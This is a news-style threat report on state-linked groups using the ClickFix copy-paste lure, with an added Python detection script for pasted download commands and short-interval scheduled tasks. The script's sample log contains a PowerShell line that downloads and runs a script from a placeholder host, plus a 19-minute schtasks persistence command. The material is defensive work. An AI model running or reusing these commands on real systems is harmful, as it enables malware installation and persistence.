State-Backed Hackers Exploit Weaponized Documents to Spread Malware, Evade Detection


A growing number of nation-state threat actors have begun incorporating the so-called “ClickFix” social-engineering method into their malware delivery chains. Between late 2024 and early 2025, groups linked to North Korea, Iran, and Russia all leveraged this user-driven technique, originally popular among cyber-criminals, to trick targets into deploying malicious payloads on their own machines.

The ClickFix Technique Explained

ClickFix is a multi-step social engineering playbook that convinces victims to copy, paste, and execute commands on their own machines under benign pretenses—“fixing” an issue, completing a CAPTCHA, or registering a device. Once the user runs the supplied command, it typically fetches and runs follow-on scripts that implant malware, often without triggering traditional security tools.

North Korean-Linked TA427 (Kimsuky)

  • Timeline & Targets: In January–February 2025, Kimsuky (tracked as TA427) used ClickFix in phishing lures aimed at fewer than five think-tank organizations focused on North Korean affairs.
  • Attack Flow: Victims received meeting requests from a spoofed Japanese diplomat. After brief social-engineering chit-chat, they were sent a PDF linking to a faux “questionnaire” on a site mimicking the Japanese Embassy.
  • User-Driven Execution: The site urged victims to copy–paste a PowerShell command into Windows Run. That command retrieved and ran a second script, which displayed the decoy questionnaire PDF while silently installing a scheduled task that downloaded and launched the open-source Quasar RAT every 19 minutes.
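The chain above has two observable stages on the endpoint: a script host launched from an interactive parent (a command pasted into Windows Run is spawned by explorer.exe) with a download-and-execute command line, and a scheduled task that re-runs a script host at a short interval (19 minutes in this case). The following detection logic is an added example, not code from the article or from any of the vendors it draws on. It assumes Sysmon-style process-creation fields (Image, ParentImage, CommandLine, ProcessId) delivered as JSON lines; the sample events, the domain name and the one-hour interval threshold are constructed assumptions for illustration. It generalises beyond the Kimsuky case to any pasted download cradle and any short-interval task registered via schtasks.exe.

```python
import json
import re
from dataclasses import dataclass

# Keywords typical of a pasted "download and run" command line.
# Assumption: tune these to your environment; they are deliberately broad.
CRADLE_RE = re.compile(
    r"\biex\b|invoke-expression|\biwr\b|invoke-webrequest|downloadstring|"
    r"net\.webclient|-enc(odedcommand)?\b|https?://",
    re.IGNORECASE,
)
# Parents that imply a human typed or pasted the command (Windows Run -> explorer.exe).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# schtasks.exe /sc minute /mo N  registers a task repeating every N minutes.
SCHTASKS_RE = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.IGNORECASE)
MAX_BENIGN_INTERVAL_MIN = 60  # assumption: sub-hourly script-host tasks deserve review


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


def parse_events(text: str) -> list[dict]:
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list[dict]) -> list[Finding]:
    findings = []
    for e in events:
        image = _basename(e["Image"])
        parent = _basename(e.get("ParentImage", ""))
        cmd = e.get("CommandLine", "")
        # Rule 1: script host started from an interactive parent with a download cradle.
        if image in SCRIPT_HOSTS and parent in INTERACTIVE_PARENTS and CRADLE_RE.search(cmd):
            findings.append(Finding("clickfix_cradle", e["ProcessId"], cmd))
        # Rule 2: schtasks registering a short-interval task whose action is a script host.
        if image == "schtasks.exe":
            m = SCHTASKS_RE.search(cmd)
            runs_script_host = any(h.split(".")[0] in cmd.lower() for h in SCRIPT_HOSTS)
            if m and int(m.group(1)) <= MAX_BENIGN_INTERVAL_MIN and runs_script_host:
                findings.append(
                    Finding("short_interval_task", e["ProcessId"], f"every {m.group(1)} min: {cmd}")
                )
    return findings


# Constructed sample telemetry (not real campaign data); the domain is a placeholder.
SAMPLE_LOG = r"""
{"ProcessId": 1101, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -w hidden -c \"iex (iwr http://questionnaire.example.invalid/q.ps1)\""}
{"ProcessId": 1102, "Image": "C:\\Windows\\System32\\schtasks.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "schtasks /create /tn Updater /sc minute /mo 19 /tr \"powershell -w hidden -f C:\\Users\\Public\\u.ps1\""}
{"ProcessId": 1103, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -NoProfile -Command Get-Date"}
{"ProcessId": 1104, "Image": "C:\\Windows\\System32\\schtasks.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "schtasks /create /tn Backup /sc daily /st 02:00 /tr C:\\backup\\run.exe"}
"""

if __name__ == "__main__":
    for f in detect(parse_events(SAMPLE_LOG)):
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
```

Rule 1 fires on the first event only: the third event also runs from explorer.exe but carries no download indicator. Rule 2 fires on the 19-minute task but not on the daily backup job, which has neither a minute-based schedule nor a script host as its action. In production the same two rules map naturally onto Windows Security event 4698 (task created) and the process-creation feed, with an allowlist for known administrative tasks.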

Iran-Linked TA450 (MuddyWater)

  • November 2024 Campaign: Coinciding with Microsoft’s November Patch Tuesday, MuddyWater sent emails spoofing security updates. Recipients were instructed to execute a ClickFix-style PowerShell command with admin rights.
  • RMM Abuse: That command quietly installed legitimate remote monitoring and management (RMM) software (e.g., “Level”). Operators then abused the RMM tool to maintain persistence, conduct espionage, and exfiltrate data.
  • Geographic Focus: Finance, government, health, education, and transportation organizations across the UAE, Saudi Arabia, Canada, Germany, Switzerland, and the United States were targeted.

Russian-Affiliated UNK_RemoteRogue

  • Late 2024 Activity: Toward year-end, a suspected Russian group (UNK_RemoteRogue) leveraged compromised Zimbra mail servers to send lures containing links to Office documents.
  • Interactive Guides: Landing pages displayed step-by-step instructions—complete with embedded YouTube tutorials—showing victims how to paste and run JavaScript in PowerShell. This ultimately launched Empire C2-linked code.
  • Scope & Overlap: Ten messages hit two defense-industry organizations. Infrastructure overlap was noted with other phishing campaigns targeting aerospace and defense entities under the guise of Ukraine-related updates.

Implications & Outlook

The rapid uptake of ClickFix by disparate nation-state groups within weeks highlights its effectiveness and low cost of entry. While not yet a permanent fixture in every state-sponsored toolkit, the technique’s success suggests we’ll likely see further experimentation and adoption by other advanced threats in the months ahead.
